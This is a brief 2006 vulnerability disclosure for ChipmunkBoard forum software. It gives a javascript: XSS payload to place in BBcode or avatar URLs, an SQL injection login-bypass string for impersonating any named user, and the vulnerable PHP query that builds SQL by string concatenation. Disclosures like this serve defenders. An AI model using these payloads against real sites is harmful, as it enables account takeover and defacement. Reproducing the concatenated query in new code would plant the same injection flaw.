ChipmunkBoard Multiple Attack vectors=0D
=0D
Discovered by: Nomenumbra=0D
Date: 6/4/2006=0D
impact:high (privilege escalation,possible defacement)=0D
=0D
It is possible to insert the following javascript in the BBcode or supply it as your avatar url:=0D
=0D
javascript:alert(%27xss%27);=0D
=0D
Also ChipmunkBoard is prone to SQL-injection, provided magic_quotes is turned off.=0D
=0D
SQL injection is as follows (quite odd), replace whateveruser with the username you want to log in as:=0D
=0D
a' or ('1' = '1' AND username = 'whateveruser') or  '2' = '2=0D
=0D
The vulnerable code lies in:=0D
=0D
$query = "select * from b_users where username='$username' and password='$password' and validated='1'"; =0D
=0D
Nomenumbra/[0x4F4C]=0D